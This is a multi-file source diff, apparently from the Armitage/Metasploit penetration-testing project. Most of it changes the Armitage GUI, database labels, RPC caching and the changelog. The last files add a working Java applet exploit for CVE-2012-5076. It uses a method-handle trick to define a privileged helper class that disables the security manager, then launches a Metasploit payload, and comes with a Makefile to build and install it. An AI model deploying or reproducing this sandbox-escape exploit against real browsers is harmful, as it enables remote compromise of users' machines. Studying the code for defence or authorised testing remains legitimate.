@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection {
|
|||
return false;
|
||||
}
|
||||
|
||||
protected void loadLabels() {
|
||||
try {
|
||||
/* query database for label data */
|
||||
List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'");
|
||||
if (rows.size() == 0)
|
||||
return;
|
||||
|
||||
/* extract our BASE64 encoded data */
|
||||
String data = ((Map)rows.get(0)).get("data") + "";
|
||||
System.err.println("Read: " + data.length() + " bytes");
|
||||
|
||||
/* turn our data into raw data */
|
||||
byte[] raw = Base64.decode(data);
|
||||
|
||||
/* deserialize our notes data */
|
||||
ByteArrayInputStream store = new ByteArrayInputStream(raw);
|
||||
ObjectInputStream handle = new ObjectInputStream(store);
|
||||
Map temp = (Map)(handle.readObject());
|
||||
handle.close();
|
||||
store.close();
|
||||
|
||||
/* merge with our new map */
|
||||
labels.putAll(temp);
|
||||
}
|
||||
catch (Exception ex) {
|
||||
ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
protected void mergeLabels(Map l) {
|
||||
/* accept any label values and merge them into our global data set */
|
||||
Iterator i = l.entrySet().iterator();
|
||||
while (i.hasNext()) {
|
||||
Map.Entry entry = (Map.Entry)i.next();
|
||||
if ("".equals(entry.getValue())) {
|
||||
labels.remove(entry.getKey() + "");
|
||||
}
|
||||
else {
|
||||
labels.put(entry.getKey() + "", entry.getValue() + "");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* add labels to our hosts */
|
||||
public List addLabels(List rows) {
|
||||
if (labels.size() == 0)
|
||||
return rows;
|
||||
|
||||
Iterator i = rows.iterator();
|
||||
while (i.hasNext()) {
|
||||
Map entry = (Map)i.next();
|
||||
String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + "";
|
||||
if (labels.containsKey(address)) {
|
||||
entry.put("label", labels.get(address) + "");
|
||||
}
|
||||
else {
|
||||
entry.put("label", "");
|
||||
}
|
||||
}
|
||||
|
||||
return rows;
|
||||
}
|
||||
|
||||
public List filterByRoute(List rows, int max) {
|
||||
if (rFilter != null || oFilter != null) {
|
||||
if (rFilter != null || oFilter != null || lFilter != null) {
|
||||
Iterator i = rows.iterator();
|
||||
while (i.hasNext()) {
|
||||
Map entry = (Map)i.next();
|
||||
|
||||
/* make sure the address is within a route we care about */
|
||||
if (rFilter != null && entry.containsKey("address")) {
|
||||
if (!checkRoute(entry.get("address") + "")) {
|
||||
i.remove();
|
||||
|
@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection {
|
|||
}
|
||||
}
|
||||
|
||||
/* make sure the host is something we care about too */
|
||||
if (oFilter != null && entry.containsKey("os_name")) {
|
||||
if (!checkOS(entry.get("os_name") + ""))
|
||||
if (!checkOS(entry.get("os_name") + "")) {
|
||||
i.remove();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
|
||||
/* make sure the host has the right label */
|
||||
if (lFilter != null && entry.containsKey("address")) {
|
||||
if (!checkLabel(entry.get("address") + "")) {
|
||||
i.remove();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
else if (lFilter != null && entry.containsKey("host")) {
|
||||
if (!checkLabel(entry.get("host") + "")) {
|
||||
i.remove();
|
||||
continue;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection {
|
|||
public void connect(String dbstring, String user, String password) throws Exception {
|
||||
db = DriverManager.getConnection(dbstring, user, password);
|
||||
setWorkspace("default");
|
||||
loadLabels();
|
||||
}
|
||||
|
||||
public Object execute(String methodName) throws IOException {
|
||||
|
@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection {
|
|||
/* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and
|
||||
filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting
|
||||
and limit the size of the final result there. */
|
||||
int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000;
|
||||
int limit2 = rFilter == null && oFilter == null ? maxservices : 100000;
|
||||
int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000;
|
||||
int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000;
|
||||
|
||||
temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid);
|
||||
|
||||
|
@ -209,13 +310,13 @@ public class DatabaseImpl implements RpcConnection {
|
|||
if (hFilter.indexOf("sessions.") >= 0)
|
||||
tables.add("sessions");
|
||||
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
|
||||
}
|
||||
else {
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
|
||||
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
|
||||
}
|
||||
|
||||
temp.put("db.services", "SELECT DISTINCT services.*, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
|
||||
temp.put("db.services", "SELECT DISTINCT services.id, services.name, services.port, services.proto, services.info, services.updated_at, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
|
||||
temp.put("db.loots", "SELECT DISTINCT loots.*, hosts.address as host FROM loots, hosts WHERE hosts.id = loots.host_id AND hosts.workspace_id = " + workspaceid);
|
||||
temp.put("db.workspaces", "SELECT DISTINCT * FROM workspaces");
|
||||
temp.put("db.notes", "SELECT DISTINCT notes.*, hosts.address as host FROM notes, hosts WHERE hosts.id = notes.host_id AND hosts.workspace_id = " + workspaceid);
|
||||
|
@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection {
|
|||
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices));
|
||||
}
|
||||
else if (methodName.equals("db.hosts")) {
|
||||
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts));
|
||||
result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts)));
|
||||
}
|
||||
else {
|
||||
result.put(methodName.substring(3), executeQuery(query));
|
||||
|
@ -311,6 +412,10 @@ public class DatabaseImpl implements RpcConnection {
|
|||
return new HashMap();
|
||||
}
|
||||
else if (methodName.equals("db.clear")) {
|
||||
/* clear our local cache of labels */
|
||||
labels = new HashMap();
|
||||
|
||||
/* clear the database */
|
||||
executeUpdate(
|
||||
"BEGIN;" +
|
||||
"DELETE FROM hosts;" +
|
||||
|
@ -332,6 +437,7 @@ public class DatabaseImpl implements RpcConnection {
|
|||
|
||||
rFilter = null;
|
||||
oFilter = null;
|
||||
lFilter = null;
|
||||
|
||||
List hosts = new LinkedList();
|
||||
List srvcs = new LinkedList();
|
||||
|
@ -385,6 +491,11 @@ public class DatabaseImpl implements RpcConnection {
|
|||
oFilter = (values.get("os") + "").toLowerCase().split(",\\s*");
|
||||
}
|
||||
|
||||
/* label filter */
|
||||
if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) {
|
||||
lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*");
|
||||
}
|
||||
|
||||
if (hosts.size() == 0) {
|
||||
hFilter = null;
|
||||
}
|
||||
|
@ -406,6 +517,31 @@ public class DatabaseImpl implements RpcConnection {
|
|||
result.put("rows", new Integer(stmt.executeUpdate()));
|
||||
return result;
|
||||
}
|
||||
else if (methodName.equals("db.report_labels")) {
|
||||
/* merge out global label data */
|
||||
Map values = (Map)params[0];
|
||||
mergeLabels(values);
|
||||
|
||||
/* delete our saved label data */
|
||||
executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'");
|
||||
|
||||
/* serialize our notes data */
|
||||
ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128);
|
||||
ObjectOutputStream handle = new ObjectOutputStream(store);
|
||||
handle.writeObject(labels);
|
||||
handle.close();
|
||||
store.close();
|
||||
|
||||
String data = Base64.encode(store.toByteArray());
|
||||
|
||||
/* save our label data */
|
||||
PreparedStatement stmt = null;
|
||||
stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)");
|
||||
stmt.setString(1, data);
|
||||
stmt.executeUpdate();
|
||||
|
||||
return new HashMap();
|
||||
}
|
||||
else if (methodName.equals("db.report_host")) {
|
||||
Map values = (Map)params[0];
|
||||
String host = values.get("host") + "";
|
||||
|
|
|
@ -32,7 +32,7 @@ public class RpcAsync implements RpcConnection, Async {
|
|||
if (methodName.equals("module.info") || methodName.equals("module.options") || methodName.equals("module.compatible_payloads")) {
|
||||
StringBuilder keysb = new StringBuilder(methodName);
|
||||
|
||||
for(int i = 1; i < params.length; i++)
|
||||
for(int i = 0; i < params.length; i++)
|
||||
keysb.append(params[i].toString());
|
||||
|
||||
String key = keysb.toString();
|
||||
|
|
|
@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable {
|
|||
key.append(temp.get("ports"));
|
||||
key.append(";");
|
||||
key.append(temp.get("session"));
|
||||
key.append(";");
|
||||
key.append(temp.get("labels"));
|
||||
return key.toString();
|
||||
}
|
||||
|
||||
|
|
|
@ -84,12 +84,40 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async {
|
|||
}
|
||||
|
||||
protected HashMap locks = new HashMap();
|
||||
protected String address = "";
|
||||
|
||||
public String getLocalAddress() {
|
||||
return address;
|
||||
}
|
||||
|
||||
/** Adds token, runs command, and notifies logger on call and return */
|
||||
public Object execute(String methodName, Object[] params) throws IOException {
|
||||
if (database != null && "db.".equals(methodName.substring(0, 3))) {
|
||||
return database.execute(methodName, params);
|
||||
}
|
||||
else if (methodName.equals("armitage.ping")) {
|
||||
try {
|
||||
long time = System.currentTimeMillis() - Long.parseLong(params[0] + "");
|
||||
|
||||
HashMap res = new HashMap();
|
||||
res.put("result", time + "");
|
||||
return res;
|
||||
}
|
||||
catch (Exception ex) {
|
||||
HashMap res = new HashMap();
|
||||
res.put("result", "0");
|
||||
return res;
|
||||
}
|
||||
}
|
||||
else if (methodName.equals("armitage.my_ip")) {
|
||||
HashMap res = new HashMap();
|
||||
res.put("result", address);
|
||||
return res;
|
||||
}
|
||||
else if (methodName.equals("armitage.set_ip")) {
|
||||
address = params[0] + "";
|
||||
return new HashMap();
|
||||
}
|
||||
else if (methodName.equals("armitage.lock")) {
|
||||
if (locks.containsKey(params[0] + "")) {
|
||||
Map res = new HashMap();
|
||||
|
|
|
@ -66,7 +66,7 @@ public class RpcQueue implements Runnable {
|
|||
Thread.sleep(50);
|
||||
}
|
||||
else {
|
||||
Thread.sleep(500);
|
||||
Thread.sleep(200);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
package table;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.*;
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.*;
|
||||
import javax.swing.border.*;
|
||||
import javax.swing.table.*;
|
||||
|
||||
import java.awt.*;
|
||||
import java.awt.*;
|
||||
import java.awt.event.*;
|
||||
import java.awt.image.*;
|
||||
|
||||
|
@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
public NetworkTable(Properties display) {
|
||||
this.display = display;
|
||||
|
||||
model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256);
|
||||
model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256);
|
||||
table = new ATable(model);
|
||||
TableRowSorter sorter = new TableRowSorter(model);
|
||||
sorter.toggleSortOrder(1);
|
||||
|
@ -79,23 +79,24 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
};
|
||||
|
||||
sorter.setComparator(1, hostCompare);
|
||||
sorter.setComparator(3, hostCompare);
|
||||
sorter.setComparator(4, hostCompare);
|
||||
|
||||
table.setRowSorter(sorter);
|
||||
table.setColumnSelectionAllowed(false);
|
||||
|
||||
table.getColumn("Address").setPreferredWidth(125);
|
||||
table.getColumn("Label").setPreferredWidth(125);
|
||||
table.getColumn("Pivot").setPreferredWidth(125);
|
||||
table.getColumn(" ").setPreferredWidth(32);
|
||||
table.getColumn(" ").setMaxWidth(32);
|
||||
table.getColumn("Description").setPreferredWidth(500);
|
||||
|
||||
final TableCellRenderer parent = table.getDefaultRenderer(Object.class);
|
||||
table.setDefaultRenderer(Object.class, new TableCellRenderer() {
|
||||
final TableCellRenderer phear = new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
|
||||
JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col);
|
||||
|
||||
if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
|
||||
if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
|
||||
component.setFont(component.getFont().deriveFont(Font.BOLD));
|
||||
}
|
||||
else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) {
|
||||
|
@ -110,9 +111,15 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
if (tip.length() > 0) {
|
||||
component.setToolTipText(tip);
|
||||
}
|
||||
|
||||
return component;
|
||||
}
|
||||
});
|
||||
};
|
||||
|
||||
table.getColumn("Address").setCellRenderer(phear);
|
||||
table.getColumn("Label").setCellRenderer(phear);
|
||||
table.getColumn("Description").setCellRenderer(phear);
|
||||
table.getColumn("Pivot").setCellRenderer(phear);
|
||||
|
||||
table.getColumn(" ").setCellRenderer(new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
|
||||
|
@ -252,16 +259,17 @@ public class NetworkTable extends JComponent implements ActionListener {
|
|||
public void addActionForKeySetting(String key, String dvalue, Action action) {
|
||||
}
|
||||
|
||||
public Object addNode(String id, String label, Image image, String tooltip) {
|
||||
public Object addNode(String id, String label, String description, Image image, String tooltip) {
|
||||
if (id == null || label == null)
|
||||
return null;
|
||||
|
||||
HashMap map = new HashMap();
|
||||
map.put("Address", id);
|
||||
|
||||
if (label.indexOf(id) > -1)
|
||||
label = label.substring(id.length());
|
||||
map.put("Description", label);
|
||||
if (description.indexOf(id) > -1)
|
||||
description = description.substring(id.length());
|
||||
map.put("Label", label);
|
||||
map.put("Description", description);
|
||||
map.put("Tooltip", tooltip);
|
||||
map.put("Image", image);
|
||||
map.put(" ", tooltip);
|
||||
|
|
|
@ -26,6 +26,12 @@ public class ATable extends JTable {
|
|||
specialitems.add("WORDLIST");
|
||||
specialitems.add("SESSION");
|
||||
specialitems.add("REXE");
|
||||
specialitems.add("EXE::Custom");
|
||||
specialitems.add("EXE::Template");
|
||||
specialitems.add("USERNAME");
|
||||
specialitems.add("PASSWORD");
|
||||
specialitems.add("SMBUser");
|
||||
specialitems.add("SMBPass");
|
||||
|
||||
return new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {
|
||||
|
|
|
@ -0,0 +1,238 @@
|
|||
package ui;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.*;
|
||||
|
||||
import java.awt.*;
|
||||
import java.awt.event.*;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
import armitage.ArmitageApplication;
|
||||
import msf.*;
|
||||
|
||||
/* A class to host multiple Armitage instances in one frame. Srsly */
|
||||
public class MultiFrame extends JFrame implements KeyEventDispatcher {
|
||||
protected JToolBar toolbar;
|
||||
protected JPanel content;
|
||||
protected CardLayout cards;
|
||||
protected LinkedList buttons;
|
||||
|
||||
private static class ArmitageInstance {
|
||||
public ArmitageApplication app;
|
||||
public JToggleButton button;
|
||||
public RpcConnection client;
|
||||
}
|
||||
|
||||
public Map getClients() {
|
||||
synchronized (buttons) {
|
||||
Map r = new HashMap();
|
||||
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
ArmitageInstance temp = (ArmitageInstance)i.next();
|
||||
r.put(temp.button.getText(), temp.client);
|
||||
}
|
||||
return r;
|
||||
}
|
||||
}
|
||||
|
||||
public void setTitle(ArmitageApplication app, String title) {
|
||||
if (active == app)
|
||||
setTitle(title);
|
||||
}
|
||||
|
||||
protected ArmitageApplication active;
|
||||
|
||||
/* is localhost running? */
|
||||
public boolean checkLocal() {
|
||||
synchronized (buttons) {
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
ArmitageInstance temp = (ArmitageInstance)i.next();
|
||||
if ("localhost".equals(temp.button.getText())) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
public boolean dispatchKeyEvent(KeyEvent ev) {
|
||||
if (active != null) {
|
||||
return active.getBindings().dispatchKeyEvent(ev);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
public static final void setupLookAndFeel() {
|
||||
try {
|
||||
for (UIManager.LookAndFeelInfo info : UIManager.getInstalledLookAndFeels()) {
|
||||
if ("Nimbus".equals(info.getName())) {
|
||||
UIManager.setLookAndFeel(info.getClassName());
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public void closeConnect() {
|
||||
synchronized (buttons) {
|
||||
if (buttons.size() == 0) {
|
||||
System.exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public void quit() {
|
||||
synchronized (buttons) {
|
||||
ArmitageInstance temp = null;
|
||||
content.remove(active);
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
temp = (ArmitageInstance)i.next();
|
||||
if (temp.app == active) {
|
||||
toolbar.remove(temp.button);
|
||||
i.remove();
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (buttons.size() == 0) {
|
||||
System.exit(0);
|
||||
}
|
||||
else if (buttons.size() == 1) {
|
||||
remove(toolbar);
|
||||
validate();
|
||||
}
|
||||
|
||||
if (i.hasNext()) {
|
||||
temp = (ArmitageInstance)i.next();
|
||||
}
|
||||
else {
|
||||
temp = (ArmitageInstance)buttons.getFirst();
|
||||
}
|
||||
|
||||
set(temp.button);
|
||||
}
|
||||
}
|
||||
|
||||
public MultiFrame() {
|
||||
super("");
|
||||
|
||||
setLayout(new BorderLayout());
|
||||
|
||||
/* setup our toolbar */
|
||||
toolbar = new JToolBar();
|
||||
|
||||
/* content area */
|
||||
content = new JPanel();
|
||||
cards = new CardLayout();
|
||||
content.setLayout(cards);
|
||||
|
||||
/* setup our stuff */
|
||||
add(content, BorderLayout.CENTER);
|
||||
|
||||
/* buttons?!? :) */
|
||||
buttons = new LinkedList();
|
||||
|
||||
/* do this ... */
|
||||
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
|
||||
/* some basic setup */
|
||||
setSize(800, 600);
|
||||
setExtendedState(JFrame.MAXIMIZED_BOTH);
|
||||
|
||||
/* all your keyboard shortcuts are belong to me */
|
||||
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(this);
|
||||
}
|
||||
|
||||
protected void set(JToggleButton button) {
|
||||
synchronized (buttons) {
|
||||
/* set all buttons to the right state */
|
||||
Iterator i = buttons.iterator();
|
||||
while (i.hasNext()) {
|
||||
ArmitageInstance temp = (ArmitageInstance)i.next();
|
||||
if (temp.button.getText().equals(button.getText())) {
|
||||
temp.button.setSelected(true);
|
||||
active = temp.app;
|
||||
setTitle(active.getTitle());
|
||||
}
|
||||
else {
|
||||
temp.button.setSelected(false);
|
||||
}
|
||||
}
|
||||
|
||||
/* show our cards? */
|
||||
cards.show(content, button.getText());
|
||||
active.touch();
|
||||
}
|
||||
}
|
||||
|
||||
public void addButton(String title, final ArmitageApplication component, RpcConnection conn) {
|
||||
synchronized (buttons) {
|
||||
final ArmitageInstance a = new ArmitageInstance();
|
||||
a.button = new JToggleButton(title);
|
||||
a.button.setToolTipText(title);
|
||||
a.app = component;
|
||||
a.client = conn;
|
||||
|
||||
a.button.addActionListener(new ActionListener() {
|
||||
public void actionPerformed(ActionEvent ev) {
|
||||
set((JToggleButton)ev.getSource());
|
||||
}
|
||||
});
|
||||
|
||||
a.button.addMouseListener(new MouseAdapter() {
|
||||
public void check(MouseEvent ev) {
|
||||
if (ev.isPopupTrigger()) {
|
||||
final JToggleButton source = a.button;
|
||||
JPopupMenu popup = new JPopupMenu();
|
||||
JMenuItem rename = new JMenuItem("Rename");
|
||||
rename.addActionListener(new ActionListener() {
|
||||
public void actionPerformed(ActionEvent ev) {
|
||||
String name = JOptionPane.showInputDialog("Rename to?", source.getText());
|
||||
if (name != null) {
|
||||
content.remove(component);
|
||||
content.add(component, name);
|
||||
source.setText(name);
|
||||
set(source);
|
||||
}
|
||||
}
|
||||
});
|
||||
popup.add(rename);
|
||||
popup.show((JComponent)ev.getSource(), ev.getX(), ev.getY());
|
||||
ev.consume();
|
||||
}
|
||||
}
|
||||
|
||||
public void mouseClicked(MouseEvent ev) {
|
||||
check(ev);
|
||||
}
|
||||
|
||||
public void mousePressed(MouseEvent ev) {
|
||||
check(ev);
|
||||
}
|
||||
|
||||
public void mouseReleased(MouseEvent ev) {
|
||||
check(ev);
|
||||
}
|
||||
});
|
||||
|
||||
toolbar.add(a.button);
|
||||
content.add(component, title);
|
||||
buttons.add(a);
|
||||
set(a.button);
|
||||
|
||||
if (buttons.size() == 1) {
|
||||
show();
|
||||
}
|
||||
else if (buttons.size() == 2) {
|
||||
add(toolbar, BorderLayout.SOUTH);
|
||||
}
|
||||
validate();
|
||||
}
|
||||
}
|
||||
}
|
|
@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel {
|
|||
check(ev);
|
||||
}
|
||||
});
|
||||
|
||||
setHorizontalAlignment(SwingConstants.CENTER);
|
||||
}
|
||||
|
||||
protected void updateIcon() {
|
||||
|
|
|
@ -1,6 +1,55 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
12 Feb 13 (tested against msf 16438)
|
||||
---------
|
||||
- Fixed a corner case preventing the display of removed host labels
|
||||
when connected to a team server.
|
||||
- Fixed RPC call cache corruption in team server mode. This bug could
|
||||
lead to some exploits defaulting to a shell payload when meterpreter
|
||||
was a possibility.
|
||||
- Slight optimization to some DB queries. I no longer pull unused
|
||||
fields making the query marginally faster. Team server is more
|
||||
efficient too as changes to unused fields won't force data (re)sync.
|
||||
- Hosts -> Clear Database now clears host labels too.
|
||||
- Added the ability to manage multiple team server instances through
|
||||
Armitage. Go to Armitage -> New Connection to connect to another
|
||||
server. A button bar will appear that allows you to switch active
|
||||
Armitage connections.
|
||||
- Credentials available across instances are pooled when using
|
||||
the [host] -> Login menu and the credential helper.
|
||||
- Rewrote the event log management code in the team server
|
||||
- Added nickname tab completion to event log. I feel like I'm writing
|
||||
an IRC client again.
|
||||
- Hosts -> Clear Database now asks you to confirm the action.
|
||||
- Hosts -> Import Hosts announces successful import to event log again.
|
||||
|
||||
23 Jan 13 (tested against msf 16351)
|
||||
---------
|
||||
- Added helpers to set EXE::Custom and EXE::Template options.
|
||||
- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
|
||||
- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
|
||||
check if a proxy server is up was deadlock prone. Removed it.
|
||||
- Starting SOCKS Proxy module now opens a tab displaying the module
|
||||
start process. An event is posted to the event log too.
|
||||
- Created an option helper to select credentials for SMBUser, SMBPass,
|
||||
USERNAME, and PASSWORD.
|
||||
- Added a feature to label hosts. A label will show up in its own column
|
||||
in table view or below all info in graph view. Any team member may
|
||||
change a label through [host] -> host -> Set Label. You may also use
|
||||
dynamic workspaces to show hosts with certain labels attached.
|
||||
- Fixed bad things happening when connecting Armitage to 'localhost' and
|
||||
not '127.0.0.1'.
|
||||
- Screenshots and Webcam shots are now centered in their tab.
|
||||
- Added an alternate .bat file to start msfrpcd on Windows in the
|
||||
Metasploit 4.5 installer's environment.
|
||||
- Added a color-style for [!] warning messages
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- &handler function now works as advertised.
|
||||
- Cortana now avoids use of core.setg
|
||||
|
||||
4 Jan 13 (tested against msf 16252)
|
||||
--------
|
||||
- Added a helper to set REXE option
|
||||
|
|
|
@ -0,0 +1,19 @@
|
|||
import java.security.AccessController;
|
||||
import java.security.PrivilegedExceptionAction;
|
||||
|
||||
public class B
|
||||
implements PrivilegedExceptionAction
|
||||
{
|
||||
public B()
|
||||
{
|
||||
try
|
||||
{
|
||||
AccessController.doPrivileged(this); } catch (Exception e) {
|
||||
}
|
||||
}
|
||||
|
||||
public Object run() {
|
||||
System.setSecurityManager(null);
|
||||
return new Object();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,78 @@
|
|||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import metasploit.Payload;
|
||||
//import java.lang.Runtime;
|
||||
import java.applet.Applet;
|
||||
import java.lang.invoke.MethodHandle;
|
||||
import java.lang.invoke.MethodHandles;
|
||||
import java.lang.invoke.MethodType;
|
||||
import java.lang.reflect.Method;
|
||||
import com.sun.org.glassfish.external.statistics.impl.*;
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
public static MethodHandles.Lookup test0;
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
|
||||
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
||||
byte[] buffer = new byte[8192];
|
||||
int length;
|
||||
|
||||
// read in the class file from the jar
|
||||
InputStream is = getClass().getResourceAsStream("B.class");
|
||||
// and write it out to the byte array stream
|
||||
while( ( length = is.read( buffer ) ) > 0 )
|
||||
bos.write( buffer, 0, length );
|
||||
// convert it to a simple byte array
|
||||
buffer = bos.toByteArray();
|
||||
|
||||
Class c = Class.forName("java.lang.invoke.MethodHandles");
|
||||
Method m = c.getMethod("lookup", new Class[0]);
|
||||
AverageRangeStatisticImpl Avrg = new AverageRangeStatisticImpl(0,0,0,"","","",0,0);
|
||||
MethodHandles.Lookup test = (MethodHandles.Lookup)Avrg.invoke(null, m, new Object[0]);
|
||||
|
||||
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
|
||||
MethodHandle localMethodHandle0 = test.findStatic(Class.class, "forName", localMethodType0);
|
||||
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
|
||||
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
|
||||
|
||||
// Instance of sun.org.mozilla.javascript.internal.Context
|
||||
MethodType localMethodType1 = MethodType.methodType(Void.TYPE);
|
||||
MethodHandle localMethodHandle1 = test.findConstructor(localClass1, localMethodType1);
|
||||
Object localObject1 = localMethodHandle1.invokeWithArguments(new Object[0]);
|
||||
|
||||
// Context.createClassLoader
|
||||
MethodType localMethodType2 = MethodType.methodType(localClass2, ClassLoader.class);
|
||||
MethodHandle localMethodHandle2 = test.findVirtual(localClass1, "createClassLoader", localMethodType2);
|
||||
Object localObject2 = localMethodHandle2.invokeWithArguments(new Object[] { localObject1, null });
|
||||
|
||||
// GeneratedClassLoader.defineClass
|
||||
MethodType localMethodType3 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
|
||||
MethodHandle localMethodHandle3 = test.findVirtual(localClass2, "defineClass", localMethodType3);
|
||||
Class localClass3 = (Class)localMethodHandle3.invokeWithArguments(new Object[] { localObject2, null, buffer });
|
||||
|
||||
//New instance of the helper Class
|
||||
localClass3.newInstance();
|
||||
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
}
|
||||
catch(Throwable ex)
|
||||
{
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
# rt.jar must be in the classpath!
|
||||
|
||||
CLASSES = \
|
||||
Exploit.java \
|
||||
B.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/
|
||||
mv B.class ../../../../data/exploits/cve-2012-5076_2/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
